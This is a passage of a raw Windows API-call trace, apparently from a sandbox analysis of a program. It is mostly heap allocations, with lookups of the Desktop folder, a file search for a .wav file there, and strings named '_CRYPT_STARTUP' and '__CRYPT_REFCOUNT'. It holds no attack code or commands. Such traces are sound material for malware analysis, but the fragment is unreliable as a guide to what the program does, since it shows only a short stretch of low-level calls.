(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0128.904] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0128.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.905] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0128.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0128.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53860 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0128.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0128.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0128.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0128.907] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0128.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0128.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0128.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0128.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0128.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0128.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0128.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0128.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0128.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0128.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.911] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-U62pFYLePGc.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1621d280, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x64b42e20, ftLastAccessTime.dwHighDateTime=0x1d5ecc5, ftLastWriteTime.dwLowDateTime=0x64b42e20, ftLastWriteTime.dwHighDateTime=0x1d5ecc5, nFileSizeHigh=0x0, nFileSizeLow=0xa916, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="-U62pFYLePGc.wav", cAlternateFileName="-U62PF~1.WAV")) returned 0xa87390 [0128.911] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0128.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0128.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.913] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0128.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0128.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.914] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0128.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0128.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.924] RtlAllocateHeap (HeapHandle=0x970000, 